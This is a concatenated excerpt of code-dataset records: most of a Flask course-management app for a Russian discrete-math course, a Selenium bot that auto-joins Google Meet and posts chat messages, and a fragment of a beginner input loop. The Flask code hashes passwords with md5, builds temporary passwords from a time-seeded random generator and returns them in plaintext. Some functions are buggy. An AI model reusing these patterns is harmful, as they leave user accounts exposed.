comments = ProblemComment.query.filter_by(problem_id=problem_id).all()\n else:\n comments = ProblemComment.query.filter(ProblemComment.problem_id==problem_id, ProblemComment.author.in_([1,1049,1050]+[flask_login.current_user.id])).all()\n\n comments_processed = []\n for c in sorted(comments, key=lambda x: x.datetime):\n comments_processed.append({\n 'text' : c.text,\n 'author' : db.session.query(User.username).filter(User.id == c.author).first()[0],\n 'datetime' : c.datetime.isoformat().replace('T', ' ')\n })\n\n return render_template('single_problem.html',\n problem_statement = latex_to_html(problem.statement, variation),\n comments = comments_processed,\n problem_id = problem_id)\n\n@app.route('/problem/<int:problem_id>/newcomment', methods = ['POST'])\n@flask_login.login_required\ndef new_problem_comment(problem_id):\n if flask_login.current_user.username not in teachers:\n if not db.session.query(History.id).filter(History.user == flask_login.current_user.id, History.problem == problem_id, History.event.in_(['SEEN', 'TRIED', 'ALMOST', 'SUCCESS'])).first():\n return jsonify(result='Комментировать задачу могут только преподаватели либо ранее решавшие её студенты.')\n\n c = ProblemComment()\n c.problem_id = problem_id\n c.datetime = datetime.now()\n c.text = request.json['comment'];\n c.author = flask_login.current_user.id\n db.session.add(c)\n db.session.commit()\n return jsonify(result='Комментарий успешно добавлен. Обновите страницу для отображения.');\n\n@app.route('/problems/<topic>')\n@flask_login.login_required\ndef show_problems(topic):\n if flask_login.current_user.username not in teachers:\n return 'Только преподаватели имеют доступ к этой странице'\n\n problems = None\n if topic == 'all':\n problems = Problem.query.all()\n show_filter_prompt = True\n else:\n show_filter_prompt = False\n if not topic.isdecimal():\n topic = db.session.query(Topic.id).filter(Topic.topic == topic).first()\n if topic:\n topic = str(topic[0])\n if topic:\n problems = Problem.query.filter_by(topics = topic).all()\n\n if problems is None:\n return 'Невозможно загрузить задачи для отображения'\n template_problems = []\n for p in problems:\n if p.topics and p.topics.split(',')[0] and p.topics.split(',')[0].isdecimal():\n t_id = int(p.topics.split(',')[0])\n topic = db.session.query(Topic.topic).filter(Topic.id==t_id).first()\n else:\n topic = ''\n if topic:\n topic = topic[0]\n else:\n topic = ''\n template_problems.append( {\n 'topic' : topic,\n 'edit_url' : url_for('edit_problem',problem_id=p.id),\n 'id' : p.id,\n 'statement' : latex_to_html(p.statement),\n 'clones' : p.clones })\n\n return render_template(\n 'multiple_problems.html',\n problems = template_problems,\n show_filter_prompt = show_filter_prompt)\n\n\n@app.route('/problem/new')\n@flask_login.login_required\ndef new_problem():\n if flask_login.current_user.username not in teachers:\n return \"Создавать задачи могут только преподаватели.\"\n\n existing_problem_id = db.session.query(Problem.id).filter(Problem.statement.like('(Условие задачи)%')).first()\n if existing_problem_id:\n return redirect(url_for('edit_problem',problem_id=existing_problem_id[0]))\n\n p = Problem()\n p.statement = '(Условие задачи)'\n p.creator = flask_login.current_user.id\n db.session.add(p)\n db.session.commit()\n return redirect(url_for('edit_problem',problem_id=p.id))\n\n\n@app.route('/problem/<int:problem_id>/edit')\n@flask_login.login_required\ndef edit_problem(problem_id):\n if flask_login.current_user.username not in teachers:\n return \"Login required for 
this URL\"\n\n p = Problem.query.filter_by(id=problem_id).first()\n if p is None:\n return 'Задача с id {0} не найдена.'.format(problem_id)\n if p.topics and p.topics.split(',')[0].isdecimal():\n topic = Topic.query.filter_by(id=int(p.topics.split(',')[0])).first().topic\n else:\n topic = ''\n\n return render_template('single_problem_edit.html',\n problem_statement=p.statement,\n problem_id = problem_id,\n topic = topic,\n clones = p.clones)\n\n@app.route('/problem/<int:problem_id>/update', methods = ['POST'])\n@flask_login.login_required\ndef update_problem(problem_id):\n if flask_login.current_user.username not in teachers:\n return jsonify(result=\"You need to be logged in as a teacher to update problem database\")\n\n p = Problem.query.filter_by(id=problem_id).first();\n p.statement = request.json['statement'];\n p.last_modified = datetime.now()\n clones = set(request.json['clones'].strip().split(','))\n if all(x.isdecimal() for x in clones):\n p.clones = ','.join(str(x) for x in sorted(int(y) for y in clones))\n else:\n p.clones = ''\n p.topics = ''\n if request.json['topic']:\n r = db.session.query(Topic.id).filter(Topic.topic==request.json['topic']).first()\n if r:\n p.topics = str(r[0])\n\n db.session.commit()\n\n return jsonify(result='Задача успешно обновлена.', processedText = latex_to_html(p.statement));\n\n\n@app.route('/trajectory/edit', methods=['GET','POST'])\n@flask_login.login_required\ndef edit_trajectory():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to update trajectory\"\n\n if request.method == 'GET':\n r = list(map(int, Trajectory.query.first().topics.split('|')))\n return render_template('trajectory.html', topics = [db.session.query(Topic.topic).filter(Topic.id==i).first()[0] for i in r])\n\n num_added_new_topics = 0\n if request.json['newtopics']:\n new_topic_names = request.json['newtopics'].split('|')\n for t in new_topic_names:\n if db.session.query(Topic.id).filter(Topic.topic==t).first() is None:\n topic = Topic()\n topic.topic = t\n db.session.add(topic)\n num_added_new_topics += 1\n\n topic_names = request.json['topics'].split('|')\n r = '|'.join(str(db.session.query(Topic.id).filter(Topic.topic==t).first()[0]) for t in topic_names)\n Trajectory.query.first().topics = r\n db.session.commit()\n\n if num_added_new_topics > 0:\n return jsonify(result='Траектория успешно обновлена; добавлено {0} новых тем.'.format(num_added_new_topics))\n return jsonify(result='Траектория успешно обновлена.')\n\n@app.route('/autocomplete/topics', methods=['GET'])\ndef autocomplete_topics():\n search = request.args.get('q')\n query = db.session.query(Topic.topic).filter(Topic.topic.like('%' + str(search) + '%'))\n return jsonify(matching_results=[itm[0] for itm in query.all()])\n\n@app.route('/latex_to_html', methods=['POST'])\n@flask_login.login_required\ndef preprocess_latex_text():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher\"\n if request.json and 'text' in request.json and request.json['text']:\n return jsonify(result = latex_to_html(request.json['text']))\n return jsonify(result = '')\n\n\n@app.route('/test/view/<int:group_number>/<int:test_number>', methods=['GET','POST'])\n@flask_login.login_required\ndef view_test(group_number, test_number):\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to view tests\"\n\n users = db.session.query(User.id, User.firstname, User.lastname)\\\n .join(Learner, 
Learner.user_id == User.id)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n if len(users) == 0:\n return 'Нет данных о студентах из группы {0}'.format(group_number)\n\n users = { u[0] : '{0} {1}'.format(u[1], u[2]) for u in users }\n\n testlog_items = TestLog.query.filter(TestLog.test_number == test_number, TestLog.user.in_(list(users))).all()\n if len(testlog_items) == 0:\n return 'Нет данных о тесте номер {0} ��руппы {1}'.format(test_number, group_number)\n\n test_date = testlog_items[0].datetime\n\n log_info = ''\n # if flask_login.current_user.username == tpbeta_superuser_username:\n # log_info = '; '.join(str(cid) + ' : ' + ','.join(str(t) for t in clones[cid]) for cid in clones)\n\n problem_sets = dict()\n\n for item in testlog_items:\n user_id = item.user\n user_problem_ids = list(map(int, item.problems.split(',')))\n user_problems = {p.id : p.statement for p in Problem.query.filter(Problem.id.in_(user_problem_ids)).all()}\n problem_sets[user_id] = [ {'id': id, 'text': latex_to_html(user_problems[id])} for id in user_problem_ids ]\n\n return render_template(\n 'test_printout.html',\n problems = problem_sets,\n users = users,\n group = group_number,\n suggested_test_number = test_number,\n date = test_date.isoformat()[:10],\n log_info = log_info,\n view_only = True)\n\n@app.route('/test/create/<int:group_number>', methods=['GET','POST'])\n@flask_login.login_required\ndef create_test(group_number):\n max_problems = int(request.args.get('max', 5))\n current_variation = defaultdict(int)\n\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to create tests\"\n\n if request.method == 'POST':\n if not request.json or 'test_number' not in request.json:\n return jsonify(result = 'Ошибка сохранения.')\n test_number = int(request.json['test_number'])\n test_date = datetime(*map(int, request.json['test_date'].split('-')))\n for s in request.json['problems'].split('|'):\n s_user, s_problems = s.split(':')\n if not s_user or db.session.query(TestLog.id).filter(TestLog.test_number == int(test_number), TestLog.user == int(s_user)).first():\n db.session.rollback()\n return jsonify(result = 'Ошибка: в базе данных уже есть запись о тесте {0} у пользователя #{1}'.format(test_number, s_user))\n testlog = TestLog()\n testlog.test_number = test_number\n testlog.datetime = test_date\n testlog.user = int(s_user)\n testlog.problems = s_problems\n db.session.add(testlog)\n db.session.commit()\n return jsonify(result = 'Информация о тесте сохранена.')\n\n users = db.session.query(User)\\\n .join(Learner, Learner.user_id == User.id)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n\n suggested_test_number = max(x[0] for x in db.session.query(TestLog.test_number).filter(TestLog.user == users[0].id).all()) + 1\n\n users = { u.id : '{0} {1}'.format(u.firstname, u.lastname) for u in users }\n\n event_to_number = { 'SEEN': 0, 'TRIED': 1, 'ALMOST': 2, 'SUCCESS': 3 }\n trajectory_list = Trajectory.query.first().topics.split('|')\n trajectory_topics = list(set(trajectory_list))\n trajectory_list = list(map(int, trajectory_list))\n problems_for_trajectory = Problem.query.filter(Problem.topics.in_(trajectory_topics)).all()\n problem_ids = list(p.id for p in problems_for_trajectory)\n clones = defaultdict(set)\n problems_by_topic = defaultdict(list)\n for p in problems_for_trajectory:\n 
problems_by_topic[int(p.topics)].append(p)\n if p.clones and len(p.clones) > 0:\n c = [int(i) for i in p.clones.split(',')]\n clones[p.id].update(c)\n for cid in clones[p.id]:\n clones[cid].add(p.id)\n\n log_info = ''\n # if flask_login.current_user.username == tpbeta_superuser_username:\n # log_info = '; '.join(str(cid) + ' : ' + ','.join(str(t) for t in clones[cid]) for cid in clones)\n\n problem_sets = dict()\n\n for user_id in users:\n user_history = { i: -1 for i in problem_ids }\n user_history_items = History.query.filter(History.user == user_id, History.problem.in_(problem_ids))\n for h in user_history_items:\n if h.event in event_to_number:\n user_history[h.problem] = max(user_history[h.problem], event_to_number[h.event])\n user_remaining_trajectory_items = trajectory_list[:]\n counted_problems = set()\n for i, t in enumerate(user_remaining_trajectory_items):\n for p in problems_by_topic[t]:\n if user_history[p.id] >= 2 and p.id not in counted_problems:\n user_remaining_trajectory_items[i] = 0\n counted_problems.add(p.id)\n if p.id in clones:\n counted_problems.update(clones[p.id])\n break\n\n user_remaining_trajectory_items = filter(None, user_remaining_trajectory_items)\n used_problem_ids = set()\n problems_for_user = list()\n for topic_id in user_remaining_trajectory_items:\n for p in problems_by_topic[topic_id]:\n if user_history[p.id] == -1 and (p.id not in used_problem_ids):\n problems_for_user.append(p)\n used_problem_ids.add(p.id)\n if p.id in clones:\n used_problem_ids.update(clones[p.id])\n break\n else:\n for p in problems_by_topic[topic_id]:\n if user_history[p.id] <= 1 and (p.id not in used_problem_ids):\n problems_for_user.append(p)\n used_problem_ids.add(p.id)\n if p.id in clones:\n used_problem_ids.update(clones[p.id])\n break\n problem_sets[user_id] = []\n for p in problems_for_user[:max_problems]:\n problem_sets[user_id].append({\n 'id': p.id,\n 'text': latex_to_html(p.statement, variation=current_variation[p.id])\n })\n current_variation[p.id] += 1\n\n return render_template(\n 'test_printout.html',\n problems = problem_sets,\n users = users,\n group = group_number,\n suggested_test_number = suggested_test_number,\n date = date.today().isoformat(),\n max_problems = max_problems,\n log_info = log_info)\n\n\n@app.route('/learnerdashboard')\n@flask_login.login_required\ndef learner_dashboard():\n if not flask_login.current_user or not hasattr(flask_login.current_user, 'username'):\n return redirect(url_for('login'))\n username = flask_login.current_user.username\n logs = TestLog.query.filter_by(user = flask_login.current_user.id).all()\n if len(logs) == 0:\n return 'Не найдено записей о результатах контрольных работ пользователя <em>{0}</em>'.format(username)\n return 'Найдены записи о тестах, проводившихся в следующие даты:<br>' + '<br>'.join( '<a href=\"{1}\">{0}</a>'.format(log.datetime.isoformat()[:10], url_for('test_results', test_number = log.test_number )) for log in logs)\n\n@app.route('/learnerdashboard/test/<int:test_number>', methods = ['GET'])\n@flask_login.login_required\ndef test_results(test_number):\n user_id = flask_login.current_user.id\n if ('user' in request.args) and flask_login.current_user.username in teachers:\n user_id = int(request.args['user'])\n\n log = TestLog.query.filter_by(user = user_id, test_number = test_number).first()\n if not log:\n return \"Не найдена информация о тесте\"\n test_history = History.query.filter_by(user = user_id, comment = 'TEST{0}'.format(test_number)).all()\n result_translator = {'SEEN' : '∅', 'TRIED' : '□', 
'ALMOST' : '◩', 'SUCCESS' : '■'}\n u_history = {h.problem: result_translator[h.event] for h in test_history if h.event in result_translator}\n problem_ids = list(map(int, log.problems.split(',')))\n marks = problem_ids[:]\n for i, id in enumerate(problem_ids):\n marks[i] = {\n 'result': u_history.get(id, ''),\n 'id': id\n }\n\n return render_template(\n 'student_test_results.html',\n name = db.session.query(User.username).filter(User.id == user_id).first()[0],\n test = test_number,\n marks = marks\n )\n\n@app.route('/learnerdashboard/trajectory', methods=['GET'])\n@flask_login.login_required\ndef trajectory_progress():\n user_id = flask_login.current_user.id\n if ('user' in request.args) and flask_login.current_user.username in teachers:\n user_id = int(request.args['user'])\n\n event_to_number = { 'SEEN': 0, 'TRIED': 1, 'ALMOST': 2, 'SUCCESS': 3 }\n number_to_square = {-1 : '□', 0 : '□', 1 : '□', 2 : '◩', 3 : '■'}\n all_topics = Topic.query.all()\n topic_names = { t.id: t.topic for t in all_topics }\n topic_levels = { t.id: t.level for t in all_topics }\n trajectory_list = Trajectory.query.first().topics.split('|')\n trajectory_topics = list(set(trajectory_list))\n trajectory_list = list(map(int, trajectory_list))\n problems_for_trajectory = Problem.query.filter(Problem.topics.in_(trajectory_topics)).all()\n problem_ids = list(p.id for p in problems_for_trajectory)\n clones = defaultdict(set)\n problems_by_topic = defaultdict(list)\n for p in problems_for_trajectory:\n problems_by_topic[int(p.topics)].append(p)\n if p.clones and len(p.clones) > 0:\n c = [int(i) for i in p.clones.split(',')]\n clones[p.id].update(c)\n for cid in clones[p.id]:\n clones[cid].add(p.id)\n\n user_history_items = History.query.filter(History.user == user_id, History.problem.in_(problem_ids))\n user_history = { i: -1 for i in problem_ids }\n review_requests = dict()\n for h in user_history_items:\n if h.event == 'REVIEW_REQUEST':\n review_requests[h.problem] = h\n if h.event in event_to_number:\n user_history[h.problem] = max(user_history[h.problem], event_to_number[h.event])\n trajectory_results = [0] * len(trajectory_list)\n result_witnesses = [0] * len(trajectory_list)\n counted_problems = set()\n for i, t in enumerate(trajectory_list):\n for p in problems_by_topic[t]:\n if user_history[p.id] >= 2 and p.id not in counted_problems:\n trajectory_results[i] = user_history[p.id]\n result_witnesses[i] = p.id\n counted_problems.add(p.id)\n if p.id in clones:\n counted_problems.update(clones[p.id])\n break\n results = []\n for i in range(len(trajectory_list)):\n r = {\n 'topic': topic_names[trajectory_list[i]],\n 'level': topic_levels[trajectory_list[i]],\n 'result' : number_to_square[trajectory_results[i]],\n 'witness' : result_witnesses[i],\n 'status' : ''\n }\n if trajectory_results[i] == 2:\n problem_id = result_witnesses[i]\n h = db.session.query(History.datetime).filter(History.user == user_id, History.problem == problem_id, History.event == 'ALMOST').first()\n if h and h[0]:\n delta = datetime.now() - h[0]\n if problem_id in review_requests:\n review_request = review_requests[problem_id]\n if review_request.comment and len(review_request.comment) > 0:\n tokens = review_request.comment.split('|', maxsplit=2)\n reviewer = tokens[0]\n if len(tokens) == 1:\n r['comment'] = 'Ваше решение на проверке у {0}'.format(reviewer)\n r['status'] = 'REVIEWER_ASSIGNED'\n else:\n r['status'] = tokens[1]\n if len(tokens) == 3:\n r['comment'] = tokens[2]\n else:\n r['comment'] = 'Ваше решение на проверке у 
{0}'.format(reviewer)\n else:\n r['comment'] = 'Запрос на проверку отправлен, но проверяющий ещё не назначен.'\n else:\n r['comment'] = 'Вы ещё не отправляли запрос на проверку этой задачи.<br>На сдачу дорешки осталось {0} дней'.format(21 - delta.days)\n r['status'] = 'REVIEW_NOT_REQUESTED'\n\n results.append(r)\n\n return render_template('student_trajectory.html',\n results = results,\n user = user_id\n )\n\n@app.route('/users')\n@flask_login.login_required\ndef show_user_list():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to view userlist\"\n users = User.query.all()\n for u in users:\n u.name = u.lastname + ' ' + u.firstname\n return render_template(\n 'user_list.html',\n users = sorted(users, key=lambda u: u.name),\n superuser = (flask_login.current_user.username == tpbeta_superuser_username))\n\n@app.route('/recover_password', methods=['POST'])\n@flask_login.login_required\ndef recover_password():\n if flask_login.current_user.username != tpbeta_superuser_username:\n return jsonify(result = 'Login error')\n\n if 'user_id' not in request.json:\n return jsonify(result = 'Error')\n\n user_id = int(request.json['user_id'])\n user = User.query.filter_by(id=user_id).first()\n\n if not user.email:\n return jsonify(result = 'Невозможно выслать пароль: не указан email.')\n\n random.seed(str(datetime.now()))\n letters = 'qwertyuiopasdfghjklzxcvbnm1029384756'\n new_password = ''.join(letters[int(random.random()*len(letters))] for _ in range(8))\n\n msg = Message( subject = 'Временный пароль к информационной системе по курсу ДС',\n body = '''Ваше имя пользователя для входа в систему: {0}\\nВаш пароль для входа: {1}'''.format(user.username,new_password),\n recipients = [user.email])\n mail.send(msg)\n\n user.pwdhash = md5(new_password)\n db.session.commit()\n\n return jsonify(result = 'Успешно выслан пароль \"{0}\"'.format(new_password))\n\n@app.route('/corrections', methods=['GET', 'POST'])\n@flask_login.login_required\ndef corrections_interface():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to mark corrections\"\n\n if request.method == 'POST':\n if not request.json or 'user' not in request.json or 'problem' not in request.json or 'result' not in request.json:\n return jsonify(result = 'Ошибка сохранения.')\n user = int(request.json['user'])\n problem = int(request.json['problem'])\n result = int(request.json['result'])\n if result == 1:\n new_item = History()\n new_item.user = user\n new_item.problem = problem\n new_item.event = 'SUCCESS'\n new_item.comment = 'CORRECTION'\n new_item.datetime = datetime.now()\n db.session.add(new_item)\n db.session.commit()\n return jsonify(result = 'Задача {0} помечена как зачтённая'.format(problem))\n else:\n item = History.query.filter_by(user=user, problem=problem, event='SUCCESS', comment = 'CORRECTION').first()\n if not item:\n return jsonify(result = 'Задача {0} не найдена среди помеченных зачтённых задач'.format(problem))\n db.session.delete(item)\n db.session.commit()\n return jsonify(result = 'Задача {0} удалена из зачтённых'.format(problem))\n\n history_items_almost = History.query.filter_by(event='ALMOST').all()\n history_items_success = History.query.filter_by(event='SUCCESS', comment='CORRECTION').all()\n users = User.query.all()\n usernames = dict()\n for u in users:\n usernames[u.id] = u.username\n\n remaining_corrections = defaultdict(dict)\n for item in history_items_almost:\n remaining_corrections[item.user][item.problem] = 
0\n for item in history_items_success:\n if item.user in remaining_corrections and item.problem in remaining_corrections[item.user]:\n remaining_corrections[item.user][item.problem] = 1\n\n data = []\n for uid in remaining_corrections:\n latex_project_url = db.session.query(Learner.latex_project_url).filter(Learner.user_id==uid).first()\n if latex_project_url:\n latex_project_url = latex_project_url[0]\n if not latex_project_url:\n latex_project_url = ''\n data.append({\n 'id': uid,\n 'name': usernames[uid],\n 'url': latex_project_url,\n 'problems': sorted(({'id': pid, 'result': res} for pid,res in remaining_corrections[uid].items()), key=lambda x: x['id'])\n })\n data.sort( key = lambda x: usernames[x['id']] )\n return render_template('corrections.html', data=data)\n\ndef notify_user(user_id, subject, body):\n user_data = User.query.filter_by(id=user_id).first()\n if not user_data.email:\n return\n message = Message(subject=\"Курс ДС: {}\".format(subject),\n body=\"Здравствуйте, {}!\\n{}\".format(user_data.firstname, body),\n recipients=[user_data.email])\n mail.send(msg)\n\n@app.route('/review', methods=['POST','GET'])\n@flask_login.login_required\ndef review_interface():\n if request.method == 'POST':\n if not request.json or 'user' not in request.json or 'problem' not in request.json or 'action' not in request.json:\n return jsonify(result = 'Ошибка сохранения')\n user = int(request.json['user'])\n problem = int(request.json['problem'])\n action = request.json['action']\n if action == 'SEND_FOR_REVIEW':\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n if h:\n return jsonify(result = 'Запрос на проверку уже был отправлен ранее.')\n h = History()\n h.datetime = datetime.now()\n h.user = user\n h.problem = problem\n h.event = 'REVIEW_REQUEST'\n db.session.add(h)\n db.session.commit()\n return jsonify(result = 'Запрос отправлен')\n elif action == 'RESEND_FOR_REVIEW':\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n if not h:\n return jsonify(result = 'Запрос на проверку ранее не отправлялся.')\n tokens = h.comment.split('|')\n tokens[1] = 'REVIEW_REQUEST_RESENT'\n h.comment = '|'.join(tokens[:2])\n db.session.commit()\n return jsonify(result = 'Запрос отправлен')\n elif action == 'TAKE_FOR_REVIEW' and flask_login.current_user.username in teachers:\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n h.comment = flask_login.current_user.username\n db.session.commit()\n return jsonify(result = 'Успешно изменён проверяющий для задачи', reviewer = flask_login.current_user.username)\n elif action == 'DELETE_REQUEST' and flask_login.current_user.username in teachers:\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n db.session.delete(h)\n db.session.commit()\n return jsonify(result = 'Запрос на проверку закрыт')\n elif action == 'SEND_FOR_REWORK' and flask_login.current_user.username in teachers:\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n if 'comment' in request.json:\n comment = request.json['comment']\n else:\n comment = 'Проверяющий {0} затребовал доработку решения'.format(flask_login.current_user.username)\n h.comment = '{0}|{1}|{2}'.format(flask_login.current_user.username, 'REWORK_REQUIRED', comment)\n notify_user(user, \"Ваше решение отправлено на доработку\",\n \"Ваша дорешка по задаче {} отправлена на доработку с комментарием: {}\".format(problem, comment));\n 
db.session.commit()\n return jsonify(result = 'Запрос на доработку отправлен')\n elif action == 'REMOVE_EXPIRED':\n if flask_login.current_user.username != tpbeta_superuser_username:\n return jsonify(result = 'Только суперпользователь может выполнять этот запрос')\n n_deleted = 0\n n_close_to_expiration = 0\n for i in History.query.filter_by(event='ALMOST').all():\n if db.session.query(History.id).filter(History.user==i.user, History.problem==i.problem, History.event.in_(['SUCCESS','REVIEW_REQUEST'])).first():\n continue\n if not i.datetime:\n continue\n delta = datetime.now() - i.datetime\n if delta.days <= 21:\n continue\n if delta.days > 18:\n n_close_to_expiration += 1\n db.session.delete(i)\n n_deleted += 1\n db.session.commit()\n return jsonify(result = 'Удалено {0} просроченных заданий; {1} заданий близки к просроченным'.format(n_deleted, n_close_to_expiration))\n\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to mark corrections\"\n history_items = History.query.filter_by(event='REVIEW_REQUEST').all()\n items = []\n for h in history_items:\n username = db.session.query(User.username).filter(User.id == h.user).first()[0]\n reviewer = ''\n state = 'Ожидает проверки с {0}'.format(h.datetime)\n formal_state = 'PENDING'\n\n if h.comment:\n tokens = h.comment.split('|', maxsplit=2)\n reviewer = tokens[0]\n if len(tokens) > 1:\n formal_state = tokens[1]\n if formal_state == 'REWORK_REQUIRED':\n state = 'Находится на доработке'\n if formal_state == 'REVIEW_REQUEST_RESENT':\n state = 'Студент доработал решение и отправил запрос на перепроверку'\n\n latex_project_url = db.session.query(Learner.latex_project_url).filter(Learner.user_id==h.user).first()\n if latex_project_url:\n latex_project_url = latex_project_url[0]\n if not latex_project_url:\n latex_project_url = ''\n\n items.append({\n 'username' : username,\n 'url': latex_project_url,\n 'user_id' : h.user,\n 'problem': h.problem,\n 'reviewer': reviewer,\n 'state': state,\n 'formal_state' : formal_state\n })\n return render_template('review_requests_list.html',\n items = items,\n show_remove_expired_ui = (flask_login.current_user.username == tpbeta_superuser_username))\n\n\n@app.route('/topic_stats')\ndef show_topic_stats():\n trajectory_topic_ids = list(map(int, Trajectory.query.first().topics.split('|')))\n topics = Topic.query.filter( Topic.id.in_(trajectory_topic_ids) )\n\n data = []\n for topic in topics:\n topic_problem_ids = [x[0] for x in db.session.query(Problem.id).filter(Problem.topics == str(topic.id)).all()]\n history_items_users = [x[0] for x in db.session.query(History.user).filter(History.problem.in_(topic_problem_ids), History.event.in_(['SUCCESS', 'ALMOST'])).all()]\n user_progress = defaultdict(int)\n for u in history_items_users:\n user_progress[u] += 1\n\n qty_in_trajectory = sum(1 for i in trajectory_topic_ids if i == topic.id)\n data.append({\n 'topic' : topic.topic,\n 'qty_in_trajectory' : qty_in_trajectory,\n 'num_problems' : len(topic_problem_ids),\n 'num_tries' : db.session.query(History.id).filter(History.problem.in_(topic_problem_ids)).count(),\n 'num_successful_tries' : len(history_items_users),\n 'num_clears' : sum( 1 for u in user_progress if user_progress[u] == qty_in_trajectory )\n })\n\n return render_template('problem_stats.html',data=data)\n\n\n@app.route('/comments')\n@flask_login.login_required\ndef view_comments():\n if flask_login.current_user.username not in teachers:\n return 'Просматривать комментарии могут только преподаватели'\n\n 
comments = ProblemComment.query.all()\n\n comments_processed = []\n usernames = dict()\n\n for c in sorted(comments, key=lambda x: x.datetime, reverse=True):\n if c.author not in usernames:\n user_id, username = db.session.query(User.id, User.username).filter(User.id == c.author).first()\n usernames[user_id] = username\n comments_processed.append({\n 'text' : c.text if len(c.text) < 1000 else c.text[:1000] + '…',\n 'author_username' : usernames[c.author],\n 'author_id' : c.author,\n 'datetime' : c.datetime.isoformat().replace('T', '<br>').replace('-','‑'),\n 'problem_id' : c.problem_id\n })\n\n return render_template('view_all_comments.html', comments = comments_processed)\n\n\n@app.route('/')\ndef root():\n if not flask_login.current_user or not hasattr(flask_login.current_user, 'username'):\n mode = ''\n elif flask_login.current_user.username in teachers:\n mode = 'teacher'\n else:\n mode = 'learner'\n\n return render_template('landing.html', mode = mode)\n","repo_name":"nzinov/tpbeta","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":52765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34368098458","text":"import sys\nimport selenium\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nimport os\nfrom enum import Enum\nimport threading\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\n\nimport time as t\nfrom utils import *\n\n\n'''Locating by xpath here is the best thing to do here, since google Meet changes selectors, classes name and all that sort of stuff for every meeting\n XPaths remaing the same, but a slight change by them would make this program fail.\n The xpath is found clicking by inspecting the element of the searched button, and finding the parent div tthat has role=\"button\" tag\n'''\n\nMIC_XPATH = '/html/body/div[1]/c-wiz/div/div/div[8]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[3]/div[1]/div/div/div'\nWEBCAM_XPATH = '/html/body/div[1]/c-wiz/div/div/div[8]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[3]/div[2]/div/div'\nJOIN_XPATH = '/html/body/div[1]/c-wiz/div/div/div[8]/div[3]/div/div/div[2]/div/div[1]/div[2]/div/div[2]/div/div/div[1]'\nOPTION_XPATH = '/html/body/div[1]/c-wiz/div/div/div[6]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[4]/div'\n\nCHAT_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[6]/div[3]/div[6]/div[3]/div/div[2]/div[3]'\nCHAT_SELECTCHAT_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[6]/div[3]/div[3]/div/div[2]/div[2]/div[1]/div[2]'\n\n#Using tagname for text area because xpath doesn't really work, and we're sure it's the only textarea on the webpage\nCHAT_TEXT_XPATH = \"textarea\"\n\nHANG_UP_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[8]/div[3]/div[9]/div[2]/div[2]/div'\n\nCHAT_CLOSE_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[6]/div[3]/div[3]/div/div[2]/div[1]/div[2]/div/button'\n\nbrowser = None\n\ndef initFirefox():\n global browser\n\n browser = webdriver.Firefox(firefox_profile=webdriver.FirefoxProfile(FIREFOX_PROFILE), executable_path=FIREFOX_DVD_DIR)\n\ndef joinMeeting(link):\n global browser\n\n if link == '':\n return\n\n try:\n browser.get(link)\n t.sleep(15)\n print(\"Trying to join meeting\")\n 
clickButton(By.XPATH, MIC_XPATH)\n clickButton(By.XPATH, WEBCAM_XPATH)\n clickButton(By.XPATH, JOIN_XPATH)\n except:\n # In this way, in case of any error we can try again\n print(\"Failed to join meeting, trying again in 60 secs\")\n t.sleep(60)\n joinMeeting(link)\n\n\ndef clickButton(by, selector):\n global browser\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((by, selector))).click()\n t.sleep(1)\n\ndef writeText(by, selector, text):\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((by, selector))).clear()\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((by, selector))).send_keys(text + \"\\n\")\n\ndef sendChatMsg(text):\n global browser\n\n #open chat menu\n clickButton(By.XPATH, CHAT_BTN_XPATH)\n #select chat option\n clickButton(By.XPATH, CHAT_SELECTCHAT_BTN_XPATH)\n #write msg\n writeText(By.TAG_NAME, CHAT_BTN_XPATH, text)\n t.sleep(1)\n #close chat\n clickButton(By.XPATH, CHAT_CLOSE_BTN_XPATH)\n\n\ndef checkStarted():\n try:\n clickButton(By.XPATH, OPTION_XPATH)\n except:\n return False\n return True\n\ndef hangUpMeeting():\n try:\n clickButton(By.XPATH, HANG_UP_BTN_XPATH)\n except:\n return False\n return True\n","repo_name":"EmaMaker/GoogleMeetBot","sub_path":"browser_manager.py","file_name":"browser_manager.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"16154105940","text":"lista = []\nwhile True:\n n = int(input('Digite um valor: '))\n lista.append(n)\n resp = ' '\n while resp not in \"SsNn\":\n resp = str(input('Desjea continuar (S/N): ')).upper().strip()\n if resp in 